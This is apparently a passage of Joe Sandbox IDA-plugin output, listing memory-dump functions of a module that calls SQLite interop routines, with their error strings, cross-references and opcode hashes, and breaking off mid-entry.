                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: d7ad2eda8001ddb366f62baf02ae8587ec740a172b2a7e9edaad902f6dfcef99
                                                                                                                                                                                                                                      • Instruction ID: 385bf1119ce21315db6e106bd8532d556ded7bb32f6e5f394c9a913eb9428879
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7ad2eda8001ddb366f62baf02ae8587ec740a172b2a7e9edaad902f6dfcef99
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3F0F672A50B155BEB00AF78EC06A4737989F00B29F004075F91DEB381F62CE66042E5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002B5A9,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57068
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC57061
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57052
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC5705C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 6f78b9f4e9fdb12b06c9746eaa7e0473f55207a7b64442927038d75f276c0ef0
                                                                                                                                                                                                                                      • Instruction ID: f5934a89ca92f29f58c0a5f1634b0201f7a284d85f1004e54067fdef4312bcc2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f78b9f4e9fdb12b06c9746eaa7e0473f55207a7b64442927038d75f276c0ef0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AF0F6327202105B9A109F39DC01F1737D89B407A8B0081A2B91DDF282FB1DEAB092F9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000007,failed to HeapCompact (no space), heap=%p,06900000), ref: 6BC51CDE
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000001,failed to HeapCompact (%lu), heap=%p,00000000), ref: 6BC51CF9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • failed to HeapCompact (%lu), heap=%p, xrefs: 6BC51CF2
                                                                                                                                                                                                                                      • failed to HeapCompact (no space), heap=%p, xrefs: 6BC51CD7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: failed to HeapCompact (%lu), heap=%p$failed to HeapCompact (no space), heap=%p
                                                                                                                                                                                                                                      • API String ID: 2981141233-3632242515
                                                                                                                                                                                                                                      • Opcode ID: e621a0c131026c84506faeed0abaa07452c524d24b8adf7199737b547a2749ec
                                                                                                                                                                                                                                      • Instruction ID: 1a5b139748bb5dacb6ed8d69931aad94194b0958dddd15d9095698398143bfb7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e621a0c131026c84506faeed0abaa07452c524d24b8adf7199737b547a2749ec
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84F09C72A452206FE6011F9A9C49E57BB6CEB42679F400060F90CDE141F759E91582F5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000247EF,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,00000000,?,?,6BCD2738,?,?,0000001C,00000000,6BC02BF0), ref: 6BC586DC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC586D5
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC586C6
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC586D0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: e597695ee7728fe0a3fc451f266351315aa6b28abfc42e0754d28af217790417
                                                                                                                                                                                                                                      • Instruction ID: 310d255445807c55846da9f6af7bd0b50bccb886beff7a516a31bff58e65b093
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e597695ee7728fe0a3fc451f266351315aa6b28abfc42e0754d28af217790417
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0F0E9B73241046BE7005E59EC02D9B375CDB90624F000069F908EB241FA68EA2142F5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00014F59,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC81954
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC8194D
                                                                                                                                                                                                                                      • database corruption, xrefs: 6BC81948
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC8193E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 78b64d3d794fb80f12c171228ab68a7ec2f9e119e62649b124a859952f42b225
                                                                                                                                                                                                                                      • Instruction ID: 4fd515917574142a0bdaebf19dcf3bee50fce927ba55837af42e2f87b3010960
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 78b64d3d794fb80f12c171228ab68a7ec2f9e119e62649b124a859952f42b225
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AF0E9719247006BD320DA789D06F1377E89745718F0046ACF9ADDB6C1FB25E91487F2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A753,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5B830
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC5B829
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5B81A
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC5B824
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 58e285ee8bf0bbe11aea197a3a9d2ac173ccef14409c78b1a635b73b7b717261
                                                                                                                                                                                                                                      • Instruction ID: 51a2e4eef26af68c19baf0574877ff5a1987b2b56e5d319a20fa47c13aac3817
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58e285ee8bf0bbe11aea197a3a9d2ac173ccef14409c78b1a635b73b7b717261
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADF05E776187056B8300AF69E902946BBE8EB98624700803AEA59E7741FB35A62487A5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015BE4,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC62B83
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC62B7C
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC62B6D
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC62B77
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 0b1eb3958ddeb7c1247fe34a254ef9fbc53262e8de54d3b2705567b19607f1e4
                                                                                                                                                                                                                                      • Instruction ID: 6647a3c2a94dd30edcc1d331ec635abc9708d74d02b6415fe6a6f44a7660cbf3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b1eb3958ddeb7c1247fe34a254ef9fbc53262e8de54d3b2705567b19607f1e4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9F0A0B6A1860867CB00DEA89C43E9733588784714F000258BD1D9F2C1FA28DA2083E6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A76F,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5D06B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC5D064
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5D055
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC5D05F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 93f0d12a3974d258c9dba25cb90051dd2605686afff7acc2f6df06f1185a92c4
                                                                                                                                                                                                                                      • Instruction ID: 0ec1ea12783f5e8ca2bd3199009b63d7e2ed339ca55382551feb29685b9cb506
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93f0d12a3974d258c9dba25cb90051dd2605686afff7acc2f6df06f1185a92c4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4E0D176E593186B8710FF789D02D4677ECDB05724F0000DAED49E7341F975AA2042E6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A76F,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC6155B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC61554
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC61545
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC6154F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 8f86f35a8440139a8dab2ff02ad4cb809254e8fa4f3d37c4405f9e9a30fe9bc4
                                                                                                                                                                                                                                      • Instruction ID: a6e318438c3145d8ae014c8ebe44e0390f1fd542e2c085167ab7320c68ada816
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f86f35a8440139a8dab2ff02ad4cb809254e8fa4f3d37c4405f9e9a30fe9bc4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0BE09B76E593186B4700EF689D02D47B7A8DB15721F0040ABED45E7341F975AA2082E6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AA32,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57F02
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC57EFB
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57EEC
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC57EF6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 646a0b3c379e718a6cb8edb45e9b28b7c7cc73ee57da8661b0b267ef69ed43ed
                                                                                                                                                                                                                                      • Instruction ID: e55b0e4af8379ce44d8426ee805c7e596855cbcf0ac69e1471079bc4d784fe81
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 646a0b3c379e718a6cb8edb45e9b28b7c7cc73ee57da8661b0b267ef69ed43ed
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7CE0207796572427C510D7646D05E877B484B00B38F0001D6FD5DEF281F75C9AB052D6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A753,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC58228
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC58221
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC58212
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC5821C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 013ef8d2c12d3ac53c069b982337849fe25a476d9caaae268f1fcafae86378e7
                                                                                                                                                                                                                                      • Instruction ID: 5bacd00ce597439caf8c4b2684ecadd160d7129a1549bb6f926b269359f10565
